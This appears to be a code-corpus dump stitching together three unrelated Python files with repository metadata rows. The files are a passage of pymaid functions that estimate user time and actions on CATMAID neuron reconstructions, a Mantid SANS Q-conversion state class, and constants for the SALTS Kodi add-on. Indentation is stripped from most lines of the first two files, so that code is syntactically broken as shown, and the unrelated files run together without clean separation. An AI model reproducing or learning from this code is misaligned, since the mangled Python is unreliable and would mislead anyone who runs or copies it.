Plot pie chart of contributions per user using Plotly:
>>> import plotly
>>> stats = pymaid.get_time_invested(skids, remote_instance=remote_instance)
>>> # Use plotly to generate pie chart
>>> fig = {"data": [{"values": stats.total.tolist(),
... "labels": stats.user.tolist(), "type" : "pie" }]}
>>> plotly.offline.plot(fig)
Plot reconstruction efforts over time:
>>> stats = pymaid.get_time_invested(skids, mode='OVER_TIME')
>>> # Plot time invested over time
>>> stats.T.plot()
>>> # Plot cumulative time invested over time
>>> stats.T.cumsum(axis=0).plot()
>>> # Filter for major contributors
>>> stats[stats.sum(axis=1) > 20].T.cumsum(axis=0).plot()
"""
def _extract_timestamps(ts, restrict_groups, desc='Calc'):
if ts.empty:
return {}
grouped = ts.set_index('timestamp',
drop=False).groupby(['group',
pd.Grouper(freq=bin_width)]).count() >= minimum_actions
temp_stats = {}
for g in config.tqdm(set(ts.group.unique()) & set(restrict_groups),
desc=desc, disable=config.pbar_hide, leave=False):
temp_stats[g] = sum(grouped.loc[g].values)[0] * interval
return temp_stats
if mode not in ['SUM', 'SUM2', 'OVER_TIME', 'ACTIONS']:
raise ValueError('Unknown mode "{}"'.format(mode))
if by not in ['NEURON', 'USER']:
raise ValueError('Unknown by "{}"'.format(by))
remote_instance = utils._eval_remote_instance(remote_instance)
skids = utils.eval_skids(x, remote_instance=remote_instance)
# Maximal inactive time is simply translated into binning
# We need this later for pandas.TimeGrouper() anyway
interval = max_inactive_time
bin_width = '%iMin' % interval
# Update minimum_actions to reflect actions/interval instead of
# actions/minute
minimum_actions *= interval
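# With the defaults (minimum_actions=10, max_inactive_time=3) this means a
# 3-minute bin must contain at least 30 actions to count as active, and
# every qualifying bin contributes 3 minutes to the total time invested.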
user_list = fetch.get_user_list(remote_instance=remote_instance).set_index('id')
user_dict = user_list.login.to_dict()
if not isinstance(x, (core.CatmaidNeuron, core.CatmaidNeuronList)):
x = fetch.get_neuron(skids, remote_instance=remote_instance)
if isinstance(x, core.CatmaidNeuron):
skdata = core.CatmaidNeuronList(x)
elif isinstance(x, core.CatmaidNeuronList):
skdata = x
if not isinstance(end_date, (datetime.date, np.datetime64, type(None))):
end_date = datetime.date(*end_date)
if not isinstance(start_date, (datetime.date, np.datetime64, type(None))):
start_date = datetime.date(*start_date)
# Extract connector and node IDs
node_ids = []
connector_ids = []
for n in skdata.itertuples():
if treenodes:
node_ids += n.nodes.node_id.tolist()
if connectors:
connector_ids += n.connectors.connector_id.tolist()
# Get node details
node_details = fetch.get_node_details(node_ids + connector_ids,
remote_instance=remote_instance)
# Get details for links
if links:
link_details = fetch.get_connector_links(skdata,
remote_instance=remote_instance)
# link_details contains all links. We have to subset this to existing
# connectors in case the input neurons have been pruned
link_details = link_details[link_details.connector_id.isin(connector_ids)]
else:
link_details = pd.DataFrame([], columns=['creator', 'creation_time'])
# Remove timestamps outside of date range (if provided)
if start_date:
node_details = node_details[node_details.creation_time >= np.datetime64(start_date)]
link_details = link_details[link_details.creation_time >= np.datetime64(start_date)]
if end_date:
node_details = node_details[node_details.creation_time <= np.datetime64(end_date)]
link_details = link_details[link_details.creation_time <= np.datetime64(end_date)]
# If we want to group by neuron, we need to add a "skeleton ID" column and
# check whether we need to duplicate rows with connectors
if by == 'NEURON':
# Need to add a column with the skeleton ID
node_details['skeleton_id'] = None
node_details['node_type'] = 'connector'
col_name = 'skeleton_id'
for n in skdata:
cond = node_details.node_id.isin(n.nodes.node_id.values.astype(str))
node_details.loc[cond, 'skeleton_id'] = n.skeleton_id
node_details.loc[cond, 'node_type'] = 'treenode'
# Connectors can show up in more than one neuron -> we need to duplicate
# those rows for each of the associated neurons
cn_details = []
for n in skdata:
cond1 = node_details.node_type == 'connector'
cond2 = node_details.node_id.isin(n.connectors.connector_id.values.astype(str))
node_details.loc[cond1 & cond2, 'skeleton_id'] = n.skeleton_id
this_cn = node_details.loc[cond1 & cond2]
cn_details.append(this_cn)
cn_details = pd.concat(cn_details, axis=0)
# Merge the node details again
cond1 = node_details.node_type == 'treenode'
node_details = pd.concat([node_details.loc[cond1], cn_details],
axis=0).reset_index(drop=True)
# Note that link_details already has a "skeleton_id" column
# but we need to make sure it's strings
link_details['skeleton_id'] = link_details.skeleton_id.astype(str)
create_group = edit_group = 'skeleton_id'
else:
create_group = 'creator'
edit_group = 'editor'
col_name = 'user'
# Dataframe for creation (i.e. the actual generation of the nodes)
creation_timestamps = np.append(node_details[[create_group,
'creation_time']].values,
link_details[[create_group,
'creation_time']].values,
axis=0)
creation_timestamps = pd.DataFrame(creation_timestamps,
columns=['group', 'timestamp'])
# Dataframe for edition times - can't use links as there is no editor
# Because creation of a node counts as an edit, we are removing
# timestamps where creation and edition time are less than 200ms apart
is_edit = (node_details.edition_time - node_details.creation_time) > np.timedelta64(200, 'ms')
edition_timestamps = node_details.loc[is_edit, [edit_group, 'edition_time']]
edition_timestamps.columns = ['group', 'timestamp']
# Generate dataframe for reviews -> here we have to unpack
if by == 'USER':
groups = [u for l in node_details.reviewers.values for u in l]
else:
groups = [s for l, s in zip(node_details.review_times.values,
node_details.skeleton_id.values) for ts in l]
timestamps = [ts for l in node_details.review_times.values for ts in l]
review_timestamps = pd.DataFrame([groups, timestamps]).T
review_timestamps.columns = ['group', 'timestamp']
# Change user ID to login
if by == 'USER':
if mode == 'SUM2':
node_details['creator'] = node_details.creator.map(user_dict)
node_details['editor'] = node_details.editor.map(user_dict)
link_details['creator'] = link_details.creator.map(user_dict)
creation_timestamps['group'] = creation_timestamps.group.map(user_dict)
edition_timestamps['group'] = edition_timestamps.group.map(user_dict)
review_timestamps['group'] = review_timestamps.group.map(user_dict)
# Merge all timestamps
all_timestamps = pd.concat([creation_timestamps,
edition_timestamps,
review_timestamps],
axis=0)
all_timestamps.sort_values('timestamp', inplace=True)
if by == 'USER':
# Extract the users that are relevant for us
relevant_users = all_timestamps.groupby('group').count()
groups = relevant_users[relevant_users.timestamp >= minimum_actions].index.values
else:
groups = skdata.skeleton_id
if mode == 'SUM':
# This breaks it down by time spent on creation, edition and review
stats = {k: {g: 0 for g in groups} for k in ['total',
'creation',
'edition',
'review']}
stats['total'].update(_extract_timestamps(all_timestamps,
groups,
desc='Calc total'))
stats['creation'].update(_extract_timestamps(creation_timestamps,
groups,
desc='Calc creation'))
stats['edition'].update(_extract_timestamps(edition_timestamps,
groups,
desc='Calc edition'))
stats['review'].update(_extract_timestamps(review_timestamps,
groups,
desc='Calc review'))
return pd.DataFrame([[g,
stats['total'][g],
stats['creation'][g],
stats['edition'][g],
stats['review'][g]] for g in groups],
columns=[col_name, 'total',
'creation', 'edition',
'review']
).sort_values('total',
ascending=False
).reset_index(drop=True).set_index(col_name)
elif mode == 'SUM2':
# This breaks it down by time spent on nodes, connectors and links
stats = {k: {g: 0 for g in groups} for k in ['total',
'treenodes',
'connectors',
'links']}
stats['total'].update(_extract_timestamps(all_timestamps,
groups,
desc='Calc total'))
# We need to construct separate DataFrames for nodes, connectors + links
# Note that we are using only edits that do not stem from the creation
is_tn = node_details.node_id.astype(int).isin(node_ids)
conc = np.concatenate([node_details.loc[is_tn,
[create_group, 'creation_time']
].values,
node_details.loc[is_edit & is_tn,
[edit_group, 'edition_time']
].values
],
axis=0)
treenode_timestamps = pd.DataFrame(conc, columns=['group', 'timestamp'])
stats['treenodes'].update(_extract_timestamps(treenode_timestamps,
groups,
desc='Calc treenodes'))
# Now connectors
# Note that we are using only edits that do not stem from the creation
is_cn = node_details.node_id.astype(int).isin(connector_ids)
conc = np.concatenate([node_details.loc[is_cn,
[create_group, 'creation_time']
].values,
node_details.loc[is_edit & is_cn,
[edit_group, 'edition_time']
].values
],
axis=0)
connector_timestamps = pd.DataFrame(conc, columns=['group', 'timestamp'])
stats['connectors'].update(_extract_timestamps(connector_timestamps,
groups,
desc='Calc connectors'))
# Now links
link_timestamps = pd.DataFrame(link_details[[create_group,
'creation_time']].values,
columns=['group', 'timestamp'])
stats['links'].update(_extract_timestamps(link_timestamps,
groups,
desc='Calc links'))
return pd.DataFrame([[g,
stats['total'][g],
stats['treenodes'][g],
stats['connectors'][g],
stats['links'][g]] for g in groups],
columns=[col_name, 'total',
'treenodes', 'connectors',
'links']
).sort_values('total', ascending=False
).reset_index(drop=True
).set_index(col_name)
elif mode == 'ACTIONS':
all_ts = all_timestamps.set_index('timestamp', drop=False
).timestamp.groupby(pd.Grouper(freq='1d')
).count().to_frame()
all_ts.columns = ['all_groups']
all_ts = all_ts.T
# Get total time spent
for g in config.tqdm(all_timestamps.group.unique(), desc='Calc. total',
disable=config.pbar_hide, leave=False):
this_ts = all_timestamps[all_timestamps.group == g].set_index(
'timestamp', drop=False).timestamp.groupby(pd.Grouper(freq='1d')).count().to_frame()
this_ts.columns = [g]
all_ts = pd.concat([all_ts, this_ts.T])
return all_ts.fillna(0)
elif mode == 'OVER_TIME':
# Go over all users and collect time invested
all_ts = []
for g in config.tqdm(all_timestamps.group.unique(), desc='Calc. total', disable=config.pbar_hide, leave=False):
# First count all minutes with minimum number of actions
minutes_counting = (all_timestamps[all_timestamps.group == g].set_index(
'timestamp', drop=False).timestamp.groupby(pd.Grouper(freq=bin_width)).count().to_frame() >= minimum_actions)
# Then remove the minutes that have less than minimum actions
minutes_counting = minutes_counting[minutes_counting.timestamp]
# Now group timestamps by day
this_ts = minutes_counting.groupby(pd.Grouper(freq='1d')).count()
# Rename columns to user login
this_ts.columns = [g]
# Append if any rows remain and move on
if not this_ts.empty:
all_ts.append(this_ts.T)
# Turn into DataFrame
all_ts = pd.concat(all_ts).sort_index()
# Replace NaNs with 0
all_ts.fillna(0, inplace=True)
# Add all users column
all_users = all_ts.sum(axis=0)
all_users.name = 'all_groups'
all_ts = pd.concat([all_users, all_ts.T], axis=1).T
return all_ts
def get_user_actions(users=None, neurons=None, start_date=None, end_date=None,
remote_instance=None):
"""Get timestamps of user actions (creations, editions, reviews, linking).
Important
---------
This function returns most but not all user actions::
1. The API endpoint used for finding neurons worked on by a given user
(:func:`pymaid.find_neurons`) does not return single-node neurons.
Hence, placing e.g. postsynaptic nodes is not taken into account.
2. Any creation is also an edit. However, only the last edit is kept
track of. So each creation counts as an edit for the creator until a
different user makes an edit.
Parameters
----------
users : str | list, optional
Users login(s) for which to return timestamps.
neurons : list of skeleton IDs | CatmaidNeuron/List, optional
Neurons for which to return timestamps. If None, will
find neurons by user.
start_date : tuple | datetime.date, optional
end_date : tuple | datetime.date, optional
Start and end date of time window to check.
remote_instance : CatmaidInstance, optional
Returns
-------
pandas.DataFrame
DataFrame in which each row is a user action::
user timestamp action
0
1
...
Examples
--------
In the first example we will have a look at how active a user is over
the course of a day.
>>> import pandas as pd
>>> import matplotlib.pyplot as plt
>>> # Get all actions for a single user
>>> actions = pymaid.get_user_actions(users='schlegelp',
... start_date=(2017, 11, 1))
>>> # Group by hour and see what time of the day user is usually active
>>> actions.set_index(pd.DatetimeIndex(actions.timestamp), inplace=True)
>>> hours = actions.groupby(actions.index.hour).count()
>>> ax = hours.action.plot()
>>> plt.show()
>>> # Plot day-by-day activity
>>> ax = plt.subplot()
>>> ax.scatter(actions.timestamp.dt.date.values,
... actions.timestamp.dt.time.values,
... marker='_')
"""
if not neurons and not users and not (start_date or end_date):
raise ValueError('Query must be restricted by at least a single '
'parameter!')
if users and not isinstance(users, (list, np.ndarray)):
users = [users]
# Get user dictionary (needed later)
user_list = fetch.get_user_list(remote_instance=remote_instance)
user_dict = user_list.set_index('id').login.to_dict()
if isinstance(neurons, type(None)):
neurons = fetch.find_neurons(users=users,
from_date=start_date, to_date=end_date,
reviewed_by=users,
remote_instance=remote_instance)
# Get skeletons
neurons.get_skeletons()
elif not isinstance(neurons, (core.CatmaidNeuron, core.CatmaidNeuronList)):
neurons = fetch.get_neuron(neurons, remote_instance=remote_instance)
if not isinstance(end_date, (datetime.date, type(None))):
end_date = datetime.date(*end_date)
if not isinstance(start_date, (datetime.date, type(None))):
start_date = datetime.date(*start_date)
node_ids = neurons.nodes.node_id.tolist()
connector_ids = neurons.connectors.connector_id.tolist()
# Get node details
node_details = fetch.get_node_details(node_ids + connector_ids,
remote_instance=remote_instance)
# Get details for links
link_details = fetch.get_connector_links(neurons,
remote_instance=remote_instance)
# Dataframe for creation (i.e. the actual generation of the nodes)
creation_timestamps = node_details[['creator', 'creation_time']].copy()
creation_timestamps['action'] = 'creation'
creation_timestamps.columns = ['user', 'timestamp', 'action']
# Dataframe for edition times
edition_timestamps = node_details[['editor', 'edition_time']].copy()
edition_timestamps['action'] = 'edition'
edition_timestamps.columns = ['user', 'timestamp', 'action']
# DataFrame for linking
linking_timestamps = link_details[['creator', 'creation_time']].copy()
linking_timestamps['action'] = 'linking'
linking_timestamps.columns = ['user', 'timestamp', 'action']
# Generate dataframe for reviews
reviewers = [u for l in node_details.reviewers.tolist() for u in l]
timestamps = [ts for l in node_details.review_times.tolist() for ts in l]
review_timestamps = pd.DataFrame([[u, ts, 'review'] for u, ts in zip(
reviewers, timestamps)], columns=['user', 'timestamp', 'action'])
# Merge all timestamps
all_timestamps = pd.concat([creation_timestamps,
edition_timestamps,
review_timestamps,
linking_timestamps],
axis=0).reset_index(drop=True)
# Map login onto user ID
all_timestamps.user = [user_dict[u] for u in all_timestamps.user.values]
# Remove other users (only if an explicit user restriction was given)
if users:
    all_timestamps = all_timestamps[all_timestamps.user.isin(users)]
# Remove timestamps outside of date range (if provided)
if start_date:
all_timestamps = all_timestamps[all_timestamps.timestamp.values >= np.datetime64(start_date)]
if end_date:
all_timestamps = all_timestamps[all_timestamps.timestamp.values <= np.datetime64(end_date)]
return all_timestamps.sort_values('timestamp').reset_index(drop=True)
|
gpl-3.0
| 476,608,047,681,674,560
| 41.385082
| 131
| 0.538347
| false
| 4.267004
| false
| false
| false
|
mganeva/mantid
|
scripts/SANS/sans/state/convert_to_q.py
|
1
|
10526
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# pylint: disable=too-few-public-methods
"""State describing the conversion to momentum transfer"""
from __future__ import (absolute_import, division, print_function)
import json
import copy
from sans.state.state_base import (StateBase, rename_descriptor_names, BoolParameter, PositiveFloatParameter,
ClassTypeParameter, StringParameter)
from sans.common.enums import (ReductionDimensionality, RangeStepType, SANSFacility)
from sans.state.state_functions import (is_pure_none_or_not_none, is_not_none_and_first_larger_than_second,
validation_message)
from sans.state.automatic_setters import (automatic_setters)
# ----------------------------------------------------------------------------------------------------------------------
# State
# ----------------------------------------------------------------------------------------------------------------------
@rename_descriptor_names
class StateConvertToQ(StateBase):
reduction_dimensionality = ClassTypeParameter(ReductionDimensionality)
use_gravity = BoolParameter()
gravity_extra_length = PositiveFloatParameter()
radius_cutoff = PositiveFloatParameter()
wavelength_cutoff = PositiveFloatParameter()
# 1D settings
q_min = PositiveFloatParameter()
q_max = PositiveFloatParameter()
q_1d_rebin_string = StringParameter()
# 2D settings
q_xy_max = PositiveFloatParameter()
q_xy_step = PositiveFloatParameter()
q_xy_step_type = ClassTypeParameter(RangeStepType)
# -----------------------
# Q Resolution specific
# ---------------------
use_q_resolution = BoolParameter()
q_resolution_collimation_length = PositiveFloatParameter()
q_resolution_delta_r = PositiveFloatParameter()
moderator_file = StringParameter()
# Circular aperture settings
q_resolution_a1 = PositiveFloatParameter()
q_resolution_a2 = PositiveFloatParameter()
# Rectangular aperture settings
q_resolution_h1 = PositiveFloatParameter()
q_resolution_h2 = PositiveFloatParameter()
q_resolution_w1 = PositiveFloatParameter()
q_resolution_w2 = PositiveFloatParameter()
def __init__(self):
super(StateConvertToQ, self).__init__()
self.reduction_dimensionality = ReductionDimensionality.OneDim
self.use_gravity = False
self.gravity_extra_length = 0.0
self.use_q_resolution = False
self.radius_cutoff = 0.0
self.wavelength_cutoff = 0.0
def validate(self):
is_invalid = {}
# 1D Q settings
if not is_pure_none_or_not_none([self.q_min, self.q_max]):
entry = validation_message("The q boundaries for the 1D reduction are inconsistent.",
"Make sure that both q boundaries are set (or none).",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if is_not_none_and_first_larger_than_second([self.q_min, self.q_max]):
entry = validation_message("Incorrect q bounds for 1D reduction.",
"Make sure that the lower q bound is smaller than the upper q bound.",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if self.reduction_dimensionality is ReductionDimensionality.OneDim:
if self.q_min is None or self.q_max is None:
entry = validation_message("Q bounds not set for 1D reduction.",
"Make sure to set the q boundaries when using a 1D reduction.",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if self.q_1d_rebin_string is not None:
if self.q_1d_rebin_string == "":
entry = validation_message("Q rebin string does not seem to be valid.",
"Make sure to provide a valid rebin string",
{"q_1d_rebin_string": self.q_1d_rebin_string})
is_invalid.update(entry)
elif not is_valid_rebin_string(self.q_1d_rebin_string):
entry = validation_message("Q rebin string does not seem to be valid.",
"Make sure to provide a valid rebin string",
{"q_1d_rebin_string": self.q_1d_rebin_string})
is_invalid.update(entry)
# QXY settings
if self.reduction_dimensionality is ReductionDimensionality.TwoDim:
if self.q_xy_max is None or self.q_xy_step is None:
entry = validation_message("Q bounds not set for 2D reduction.",
"Make sure that the q_max value bound and the step for the 2D reduction.",
{"q_xy_max": self.q_xy_max,
"q_xy_step": self.q_xy_step})
is_invalid.update(entry)
# Q Resolution settings
if self.use_q_resolution:
if not is_pure_none_or_not_none([self.q_resolution_a1, self.q_resolution_a2]):
entry = validation_message("Inconsistent circular geometry.",
"Make sure that both diameters for the circular apertures are set.",
{"q_resolution_a1": self.q_resolution_a1,
"q_resolution_a2": self.q_resolution_a2})
is_invalid.update(entry)
if not is_pure_none_or_not_none([self.q_resolution_h1, self.q_resolution_h2, self.q_resolution_w1,
self.q_resolution_w2]):
entry = validation_message("Inconsistent rectangular geometry.",
"Make sure that both diameters for the circular apertures are set.",
{"q_resolution_h1": self.q_resolution_h1,
"q_resolution_h2": self.q_resolution_h2,
"q_resolution_w1": self.q_resolution_w1,
"q_resolution_w2": self.q_resolution_w2})
is_invalid.update(entry)
if all(element is None for element in [self.q_resolution_a1, self.q_resolution_a2, self.q_resolution_w1,
self.q_resolution_w2, self.q_resolution_h1, self.q_resolution_h2]):
entry = validation_message("Aperture is undefined.",
"Make sure that you set the geometry for a circular or a "
"rectangular aperture.",
{"q_resolution_a1": self.q_resolution_a1,
"q_resolution_a2": self.q_resolution_a2,
"q_resolution_h1": self.q_resolution_h1,
"q_resolution_h2": self.q_resolution_h2,
"q_resolution_w1": self.q_resolution_w1,
"q_resolution_w2": self.q_resolution_w2})
is_invalid.update(entry)
if self.moderator_file is None:
entry = validation_message("Missing moderator file.",
"Make sure to specify a moderator file when using q resolution.",
{"moderator_file": self.moderator_file})
is_invalid.update(entry)
is_invalid.update({"moderator_file": "A moderator file is required for the q resolution calculation."})
if is_invalid:
raise ValueError("StateMoveDetectorISIS: The provided inputs are illegal. "
"Please see: {0}".format(json.dumps(is_invalid)))
# ----------------------------------------------------------------------------------------------------------------------
# Builder
# ----------------------------------------------------------------------------------------------------------------------
class StateConvertToQBuilder(object):
@automatic_setters(StateConvertToQ)
def __init__(self):
super(StateConvertToQBuilder, self).__init__()
self.state = StateConvertToQ()
def build(self):
self.state.validate()
return copy.copy(self.state)
# ------------------------------------------
# Factory method for StateConvertToQBuilder
# ------------------------------------------
def get_convert_to_q_builder(data_info):
# The data state has most of the information that we require to define the q conversion.
# For the factory method, only the facility/instrument is of relevance.
facility = data_info.facility
if facility is SANSFacility.ISIS:
return StateConvertToQBuilder()
else:
raise NotImplementedError("StateConvertToQBuilder: Could not find any valid save builder for the "
"specified StateData object {0}".format(str(data_info)))
# -------------------------------------------
# Free functions
# -------------------------------------------
def is_valid_rebin_string(rebin_string):
is_valid = True
try:
values = [float(el) for el in rebin_string.split(",")]
if len(values) < 2:
is_valid = False
elif len(values) == 2:
if values[0] > values[1]:
is_valid = False
elif len(values) % 2 == 1: # odd number of entries
step_points = values[::2]
if not is_increasing(step_points):
is_valid = False
else:
is_valid = False
except: # noqa
is_valid = False
return is_valid
def is_increasing(step_points):
return all(el1 <= el2 for el1, el2 in zip(step_points, step_points[1:]))
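# Hedged examples (comment-only, derived directly from the checks above): a
# rebin string alternates boundary,step,boundary,... so valid strings have
# either exactly two values with the first not exceeding the second, or an
# odd number of entries whose boundary values (every other entry) increase:
#
#   is_valid_rebin_string("0.01,1.0")        # True  (start, stop)
#   is_valid_rebin_string("0.01,0.02,1.0")   # True  (start, step, stop)
#   is_valid_rebin_string("1.0,0.02,0.01")   # False (boundaries decrease)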
|
gpl-3.0
| -7,986,338,881,087,957,000
| 48.650943
| 120
| 0.519286
| false
| 4.504065
| false
| false
| false
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/constants.py
|
1
|
7791
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
def __enum(**enums):
return type('Enum', (), enums)
MODES = __enum(
MAIN='main', BROWSE='browse', TRENDING='trending', RECOMMEND='recommend', CAL='calendar', MY_CAL='my_calendar', MY_LISTS='lists',
SEARCH='search', SEASONS='seasons', EPISODES='episodes', GET_SOURCES='get_sources', MANAGE_SUBS='manage_subs', GET_LIST='get_list', SET_URL_MANUAL='set_url_manual',
SET_URL_SEARCH='set_url_search', SHOW_FAVORITES='browse_favorites', SHOW_WATCHLIST='browse_watchlist', PREMIERES='premiere_calendar', SHOW_LIST='show_list',
OTHER_LISTS='other_lists', ADD_OTHER_LIST='add_other_list', PICK_SUB_LIST='pick_sub_list', PICK_FAV_LIST='pick_fav_list', UPDATE_SUBS='update_subs', CLEAN_SUBS='clean_subs',
SET_SUB_LIST='set_sub_list', SET_FAV_LIST='set_fav_list', REM_FROM_LIST='rem_from_list', ADD_TO_LIST='add_to_list', ADD_TO_LIBRARY='add_to_library', SCRAPERS='scrapers',
TOGGLE_SCRAPER='toggle_scraper', RESET_DB='reset_db', FLUSH_CACHE='flush_cache', RESOLVE_SOURCE='resolve_source', SEARCH_RESULTS='search_results',
MOVE_SCRAPER='scraper_move', EDIT_TVSHOW_ID='edit_id', SELECT_SOURCE='select_source', SHOW_COLLECTION='show_collection',
SHOW_PROGRESS='show_progress', PLAY_TRAILER='play_trailer', RENAME_LIST='rename_list', EXPORT_DB='export_db', IMPORT_DB='import_db', COPY_LIST='copy_list',
REMOVE_LIST='remove_list', ADD_TO_COLL='add_to_collection', TOGGLE_WATCHED='toggle_watched', RATE='rate', FORCE_REFRESH='force_refresh', TOGGLE_TITLE='toggle_title',
RES_SETTINGS='resolver_settings', ADDON_SETTINGS='addon_settings', TOGGLE_ALL='toggle_all', MOVE_TO='move_to', REM_FROM_COLL='rem_from_collection',
URL_EXISTS='url_exists', RECENT_SEARCH='recent_search', SAVED_SEARCHES='saved_searches', SAVE_SEARCH='save_search', DELETE_SEARCH='delete_search', SET_VIEW='set_view',
SETTINGS='settings', SHOW_VIEWS='show_views', BROWSE_VIEW='browse_view', BROWSE_URLS='browse_urls', DELETE_URL='delete_url', DOWNLOAD_SOURCE='download_source',
DIRECT_DOWNLOAD='direct_download', POPULAR='popular', RECENT='recent', DELETE_RECENT='delete_recent', CLEAR_RECENT='clear_recent', AUTH_TRAKT='auth_trakt',
AUTO_CONF='auto_config', CLEAR_SAVED='clear_saved', RESET_BASE_URL='reset_base_url', TOGGLE_TO_MENU='toggle_to_menu', LIKED_LISTS='liked_lists', MOSTS='mosts',
PLAYED='played', WATCHED='watched', COLLECTED='collected', SHOW_BOOKMARKS='show_bookmarks', DELETE_BOOKMARK='delete_bookmark', SHOW_HISTORY='show_history',
RESET_FAILS='reset_failures', MANAGE_PROGRESS='toggle_progress', AUTOPLAY='autoplay', INSTALL_THEMES='install_themes', RESET_REL_URLS='reset_rel_urls',
ANTICIPATED='anticipated')
SECTIONS = __enum(TV='TV', MOVIES='Movies')
VIDEO_TYPES = __enum(TVSHOW='TV Show', MOVIE='Movie', EPISODE='Episode', SEASON='Season')
CONTENT_TYPES = __enum(TVSHOWS='tvshows', MOVIES='movies', SEASONS='seasons', EPISODES='episodes', SOURCES='sources')
TRAKT_SECTIONS = {SECTIONS.TV: 'shows', SECTIONS.MOVIES: 'movies'}
TRAKT_SORT = __enum(TITLE='title', ACTIVITY='activity', MOST_COMPLETED='most-completed', LEAST_COMPLETED='least-completed', RECENTLY_AIRED='recently-aired',
PREVIOUSLY_AIRED='previously-aired')
TRAKT_LIST_SORT = __enum(RANK='rank', RECENTLY_ADDED='added', TITLE='title', RELEASE_DATE='released', RUNTIME='runtime', POPULARITY='popularity',
PERCENTAGE='percentage', VOTES='votes')
TRAKT_SORT_DIR = __enum(ASCENDING='asc', DESCENDING='desc')
SORT_MAP = [TRAKT_SORT.ACTIVITY, TRAKT_SORT.TITLE, TRAKT_SORT.MOST_COMPLETED, TRAKT_SORT.LEAST_COMPLETED, TRAKT_SORT.RECENTLY_AIRED,
TRAKT_SORT.PREVIOUSLY_AIRED]
QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080')
DIRS = __enum(UP='up', DOWN='down')
WATCHLIST_SLUG = 'watchlist_slug'
COLLECTION_SLUG = 'collection_slug'
SEARCH_HISTORY = 10
DEFAULT_EXT = '.mpg'
CHUNK_SIZE = 512 * 1024
PROGRESS = __enum(OFF=0, WINDOW=1, BACKGROUND=2)
FORCE_NO_MATCH = '***FORCE_NO_MATCH***'
SHORT_MONS = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
ACTIONS = __enum(ADD='add', REMOVE='remove')
TRIG_DB_UPG = False
# sort keys need to be defined such that "best" have highest values
# unknown (i.e. None) is always worst
SORT_KEYS = {}
SORT_KEYS['quality'] = {None: 0, QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
SORT_LIST = ['none', 'source', 'quality', 'views', 'rating', 'direct', 'debrid']
SORT_SIGNS = {'0': -1, '1': 1} # 0 = Best to Worst; 1 = Worst to Best
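# Hedged sketch (illustrative; `hosters` and `sort_order` are assumed names,
# not defined in this module): combining SORT_KEYS with SORT_SIGNS to order
# sources, with unknown (None) quality always ranked worst:
#
#   quality_rank = lambda h: SORT_KEYS['quality'].get(h.get('quality'), 0)
#   hosters.sort(key=quality_rank, reverse=(SORT_SIGNS[sort_order] == -1))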
HOURS_LIST = {}
HOURS_LIST[MODES.UPDATE_SUBS] = [.5, 1] + range(2, 25)
LONG_AGO = '1970-01-01 23:59:00.000000'
TEMP_ERRORS = [500, 502, 503, 504, 520, 521, 522, 524]
SRT_SOURCE = 'addic7ed'
DISABLE_SETTINGS = __enum(OFF='0', PROMPT='1', ON='2')
BLOG_Q_MAP = {}
BLOG_Q_MAP[QUALITIES.LOW] = [' CAM ', ' TS ', ' R6 ', 'CAMRIP']
BLOG_Q_MAP[QUALITIES.MEDIUM] = ['-XVID', '-MP4', 'MEDIUM']
BLOG_Q_MAP[QUALITIES.HIGH] = ['HDRIP', 'DVDRIP', 'BRRIP', 'BDRIP', '480P', 'HDTV']
BLOG_Q_MAP[QUALITIES.HD720] = ['720', 'HDTS', ' HD ']
BLOG_Q_MAP[QUALITIES.HD1080] = ['1080']
HOST_Q = {}
HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid']
HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'vidzi', 'vidbull', 'realvid', 'nosvideo',
'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare.io']
HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag', 'thevideo']
HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch']
HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos']
Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5}
IMG_SIZES = ['full', 'medium', 'thumb']
USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
BR_VERS = [
['%s.0' % i for i in xrange(18, 43)],
['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111',
'40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71',
'46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'],
['11.0']]
